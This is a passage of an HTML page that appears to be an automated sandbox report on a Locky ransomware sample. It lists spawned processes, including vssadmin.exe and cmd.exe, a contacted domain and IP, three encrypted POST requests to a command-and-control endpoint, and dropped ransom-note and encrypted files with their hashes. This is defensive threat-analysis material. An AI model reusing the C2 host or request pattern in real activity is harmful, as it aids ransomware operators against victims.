<span class="badge synchronization" style="color: black;">synchronization</span>
</p>

<div class="calltable"></div>

<div class="pagination pagination-centered pagination_1592"><ul></ul></div>

<script>
// Request page 1 of the API-call table for PID 1592 as soon as this pane is parsed.
load_chunck(1592, 1);
</script>
</div>
<div class="tab-pane" id="process_1840" data-pid="1840" data-length="1">
<div class="alert alert-info" style="text-align: center;"><b>vssadmin.exe</b>, PID: <b>1840</b>, Parent PID: 1592</div>
<div class="pagination pagination-centered"><ul></ul></div>

<p style="text-align: center;">
<span class="badge network" style="color: black;">network</span>
<span class="badge filesystem" style="color: black;">filesystem</span>
<span class="badge registry" style="color: black;">registry</span>
<span class="badge process" style="color: black;">process</span>
<span class="badge services" style="color: black;">services</span>
<span class="badge synchronization" style="color: black;">synchronization</span>
</p>

<div class="calltable"></div>

<div class="pagination pagination-centered pagination_1840"><ul></ul></div>

<script>
// Request page 1 of the API-call table for PID 1840 as soon as this pane is parsed.
load_chunck(1840, 1);
</script>
</div>
<div class="tab-pane" id="process_592" data-pid="592" data-length="4">
<div class="alert alert-info" style="text-align: center;"><b>NOTEPAD.EXE</b>, PID: <b>592</b>, Parent PID: 1592</div>
<div class="pagination pagination-centered"><ul></ul></div>

<p style="text-align: center;">
<span class="badge network" style="color: black;">network</span>
<span class="badge filesystem" style="color: black;">filesystem</span>
<span class="badge registry" style="color: black;">registry</span>
<span class="badge process" style="color: black;">process</span>
<span class="badge services" style="color: black;">services</span>
<span class="badge synchronization" style="color: black;">synchronization</span>
</p>

<div class="calltable"></div>

<div class="pagination pagination-centered pagination_592"><ul></ul></div>

<script>
// Request page 1 of the API-call table for PID 592 as soon as this pane is parsed.
load_chunck(592, 1);
</script>
</div>
<div class="tab-pane" id="process_308" data-pid="308" data-length="8">
<div class="alert alert-info" style="text-align: center;"><b>rundll32.exe</b>, PID: <b>308</b>, Parent PID: 1592</div>
<div class="pagination pagination-centered"><ul></ul></div>

<p style="text-align: center;">
<span class="badge network" style="color: black;">network</span>
<span class="badge filesystem" style="color: black;">filesystem</span>
<span class="badge registry" style="color: black;">registry</span>
<span class="badge process" style="color: black;">process</span>
<span class="badge services" style="color: black;">services</span>
<span class="badge synchronization" style="color: black;">synchronization</span>
</p>

<div class="calltable"></div>

<div class="pagination pagination-centered pagination_308"><ul></ul></div>

<script>
// Request page 1 of the API-call table for PID 308 as soon as this pane is parsed.
load_chunck(308, 1);
</script>
</div>
<div class="tab-pane" id="process_296" data-pid="296" data-length="1">
<div class="alert alert-info" style="text-align: center;"><b>cmd.exe</b>, PID: <b>296</b>, Parent PID: 1592</div>
<div class="pagination pagination-centered"><ul></ul></div>

<p style="text-align: center;">
<span class="badge network" style="color: black;">network</span>
<span class="badge filesystem" style="color: black;">filesystem</span>
<span class="badge registry" style="color: black;">registry</span>
<span class="badge process" style="color: black;">process</span>
<span class="badge services" style="color: black;">services</span>
<span class="badge synchronization" style="color: black;">synchronization</span>
</p>

<div class="calltable"></div>

<div class="pagination pagination-centered pagination_296"><ul></ul></div>

<script>
// Request page 1 of the API-call table for PID 296 as soon as this pane is parsed.
load_chunck(296, 1);
</script>
</div>
</div>
</div>

</div>
<div class="tab-pane fade" id="network">



<div class="tabbable tabs">
<ul class="nav nav-pills" style="margin-bottom: 0;">
<li class="active"><a href="#network_domains_tab" data-toggle="tab">Domains (1)</a></li>
<li><a href="#network_hosts_tab" data-toggle="tab">Hosts (1)</a></li>
<li><a href="#network_http_tab" data-toggle="tab">HTTP (3)</a></li>
<li><a href="#network_irc_tab" data-toggle="tab">IRC (0)</a></li>
<li><a href="#network_smtp_tab" data-toggle="tab">SMTP (0)</a></li>
</ul>
<div class="tab-content">
<div class="tab-pane fade in active" id="network_domains_tab">
<section id="domains">
<h4>Domains</h4>
<table class="table table-striped table-bordered">
<tr>
<th>Domain</th>
<th>IP</th>
</tr>
<tr>
<td>dkoipg.pw</td>
<td>85.25.149.246</td>
</tr>
</table>
</section>

</div>
<div class="tab-pane fade" id="network_hosts_tab">
<section id="hosts">
<h4>Hosts</h4>
<table class="table table-striped table-bordered">
<tr>
<th>IP</th>
</tr>
<tr>
<td>85.25.149.246</td>
</tr>
</table>
</section>

</div>
<div class="tab-pane fade" id="network_http_tab">
<h4>HTTP Requests</h4>

<table class="table table-striped table-bordered" style="table-layout: fixed;">
<tr>
<th>URI</th>
<th>Data</th>
</tr>
<tr>
<td style="word-wrap: break-word;">http://dkoipg.pw/main.php</td>
<td style="word-wrap: break-word;"><pre>POST /main.php HTTP/1.1
Host: dkoipg.pw
Content-Length: 95
Connection: Keep-Alive
Cache-Control: no-cache
\xbf\x9f\x0e\xa1\xf5t\xe5\xbasCP\xd7/\xcb\x81\x8e^\x84\xc6\xd4\xef\x11\xd1\x93\xf8\x90h\xf6\xc1\x82\xefOY~\x17*\xc5\xda\x80\x84H:\x8d\xf9\x1e+=\x1c\xa1\xf9~Y\x13\x13\x9a\x90U\x8d\x99\x14aG\xa3\xd2\xd2\x98o\x16\xba\xed\xc9\xfe\xee\xdd\x8d\x8e\xfa\xc9\x01e&amp;;\xca.{\xd4\xa8\xa7\x11R\x0b\xb4\xd9z_</pre></td>
</tr>
<tr>
<td style="word-wrap: break-word;">http://dkoipg.pw/main.php</td>
<td style="word-wrap: break-word;"><pre>POST /main.php HTTP/1.1
Host: dkoipg.pw
Content-Length: 101
Connection: Keep-Alive
Cache-Control: no-cache
v\x8a\x9eF\xb3h4B(.%\x1c\xe6V\x0b)\xec\xddj\x82\xc4\x84\x9b6*y\x9c\x8c\xfb\x9f\xe0\xcb\x98\x91\xeaK\x8a~Nc/\xc2\xdc\xa4i\xc43\xb0\xe5\\xff\xb4\xfei@\x84\xfeZv.\xc7\x04X\x87\xf7\xc6\x9a\xa5\xc0\x8dC@?\xbb\xf0\xad\xc3\xa6\xdc1:$\xc3)b\xcafz\x9b\xca`K\xc7]\xc8\x03\x802:\xabA</pre></td>
</tr>
<tr>
<td style="word-wrap: break-word;">http://dkoipg.pw/main.php</td>
<td style="word-wrap: break-word;"><pre>POST /main.php HTTP/1.1
Host: dkoipg.pw
Content-Length: 55
Connection: Keep-Alive
Cache-Control: no-cache
\xb7\x8e\x92\xf0\xc8\xf1\xf3[7\xa9\xbc\xc4M&gt;\xf0\x13\xad\xfdz
\x00\xe6\xaa.&amp;\xff_m\x8b&#39;\xbce\xca\xc8&gt;\xb1\x1f72\xed\xd0 {\xe8\x00q\xbb\x1a\x19\xa0\x85\x89\xe10\x0f</pre></td>
</tr>
</table>

</div>
<div class="tab-pane fade" id="network_irc_tab">
<h4>IRC Traffic</h4>

<p>No IRC traffic.</p>

</div>
<div class="tab-pane fade" id="network_smtp_tab">
<h4>SMTP Requests</h4>

<p>No SMTP requests performed.</p>

</div>
</div>
</div>
</div>
<div class="tab-pane fade" id="dropped">
<div class="box">
<div class="box-content" style="padding: 0">
<table class="table table-striped">
<tr>
<th style="border-top: 0;">File name</th>
<td style="border-top: 0;"><b>_Locky_recover_instructions.txt</b></td>
</tr>
<tr>
<th>File Size</th>
<td>1133 bytes</td>
</tr>
<tr>
<th>File Type</th>
<td>UTF-8 Unicode (with BOM) text, with CRLF line terminators</td>
</tr>
<tr>
<th>MD5</th>
<td>28872fdc8ad0befded55c1fa8e1454a7</td>
</tr>
<tr>
<th>SHA1</th>
<td>a36b30262f3b63857387333a787a471fb9a0a926</td>
</tr>
<tr>
<th>SHA256</th>
<td>d18bc419150f0652ea5d187e872f01d35e5d5f5537881e1a877e935a492ae090</td>
</tr>
<tr>
<th>CRC32</th>
<td>4F1898E2</td>
</tr>
<tr>
<th>Ssdeep</th>
<td>24:IYiujOdZUZa2MFRqyU8JmFFiHTxlUfQCCmwZq8c8l:kuSrI9rt0YfQxZ6q</td>
</tr>
<tr>
<th>Yara</th>
<td>
None matched
</td>
</tr>
</table>
</div>
</div>
<div class="box">
<div class="box-content" style="padding: 0">
<table class="table table-striped">
<tr>
<th style="border-top: 0;">File name</th>
<td style="border-top: 0;"><b>_Locky_recover_instructions.bmp</b></td>
</tr>
<tr>
<th>File Size</th>
<td>3151210 bytes</td>
</tr>
<tr>
<th>File Type</th>
<td>PC bitmap, Windows 3.x format, 1229 x 641 x 32</td>
</tr>
<tr>
<th>MD5</th>
<td>4a1af0e5f6f033d4273cf7137f021ae5</td>
</tr>
<tr>
<th>SHA1</th>
<td>64cc4f1964ea3667d28bc681df8864d4cd20ac31</td>
</tr>
<tr>
<th>SHA256</th>
<td>4a2f58022ac8f907daca570af6b8e2f6381b468c6b9927f40270ab546a0352a9</td>
</tr>
<tr>
<th>CRC32</th>
<td>AF4CD464</td>
</tr>
<tr>
<th>Ssdeep</th>
<td>384:e1XYA3KhasjuuUnLLFm5IVEUYl8Oi13F19PaFQI+ZugYMTpElWl2RRqq5maS8vVk:2</td>
</tr>
<tr>
<th>Yara</th>
<td>
None matched
</td>
</tr>
</table>
</div>
</div>
<div class="box">
<div class="box-content" style="padding: 0">
<table class="table table-striped">
<tr>
<th style="border-top: 0;">File name</th>
<td style="border-top: 0;"><b>27F18F41A6BDB525437D5356700D902C.locky</b></td>
</tr>
<tr>
<th>File Size</th>
<td>836 bytes</td>
</tr>
<tr>
<th>File Type</th>
<td>data</td>
</tr>
<tr>
<th>MD5</th>
<td>0a8a5a4d601e590de67ddff3a4ca97a4</td>
</tr>
<tr>
<th>SHA1</th>
<td>5f2f36f7532043b64d42bc5ef520f92f865459ce</td>
</tr>
<tr>
<th>SHA256</th>
<td>828100274f6a466f317dc570ea3c4c241c4783ea758991342af84eace7a4fd3b</td>
</tr>
<tr>
<th>CRC32</th>
<td>0BA9B0B9</td>
</tr>
<tr>
<th>Ssdeep</th>
<td>12:vGEcSqGAZ33ktStcnZmP/R/DAyvWC4HDYSYmFnZ7QKCYeto6+4PiNONvu4aZ52tO:vGAqGAZ3xGZL3HseHQYe1P1u4a6FLQ</td>
</tr>
<tr>
<th>Yara</th>
<td>
None matched
</td>
</tr>
</table>
</div>
</div>
<div class="box">
<div class="box-content" style="padding: 0">
<table class="table table-striped">
<tr>
<th style="border-top: 0;">File name</th>
<td style="border-top: 0;"><b>65fg67n.exe</b></td>
</tr>
<tr>
<th>File Size</th>
<td>208896 bytes</td>
</tr>
<tr>
<th>File Type</th>
<td>PE32 executable (GUI) Intel 80386, for MS Windows</td>
</tr>
<tr>
<th>MD5</th>
<td>e1a9b6f7285a85e682ebcad028472d13</td>
</tr>
<tr>
<th>SHA1</th>
<td>1347b810ac90c13154908f7cf45b11913c182e44</td>
</tr>
<tr>
<th>SHA256</th>
<td>5e945c1d27c9ad77a2b63ae10af46aee7d29a6a43605a9bfbf35cebbcff184d8</td>
</tr>
<tr>
<th>CRC32</th>
<td>E4BE5457</td>
</tr>
<tr>
<th>Ssdeep</th>
<td>3072:esOe84dmDsobhW7CfhQ7J37HBWTH6sDq2bEGKPe59jLi7TuKmx5wxv+18:jr84+sqhkCepzBW3bNV5408</td>
</tr>
<tr>
<th>Yara</th>
<td>
None matched
</td>
</tr>
</table>
</div>
</div>

</div>
<div class="tab-pane fade" id="comments">
<div class="alert alert-info"><b>Bummer!</b> No comments yet.</div>



</div>
</div>
</div>


</div>
<div id="footer-extra">
<div class="container-fluid center">
<div>The content of this website is released under Creative Commons <a href="http://creativecommons.org/licenses/by-nc-sa/3.0/">CC BY-NC-SA 3.0</a> license</div>
<div>with love, <a href="http://twitter.com/botherder"><i>nex</i></a> &amp; <a href="http://twitter.com/jekil"><i>jekil</i></a></div>
<div style="margin-top: 10px;"><a href="http://www.shadowserver.org"><img src="/static/graphic/shadowserver.png" alt="Shadowserver" border="0" /></a></div>
</div>
</div>
<script src="/static/js/bootstrap.min.js"></script>
<script src="/static/js/bootstrap-fileupload.js"></script>
<script src="/static/js/graph/highcharts-2.3.2.js"></script>
<script src="/static/js/graph/graph-0.8.js"></script>
<script src="/static/js/lightbox.js"></script>
<script src="/static/js/jquery.tagcloud.js"></script>
</body>
</html>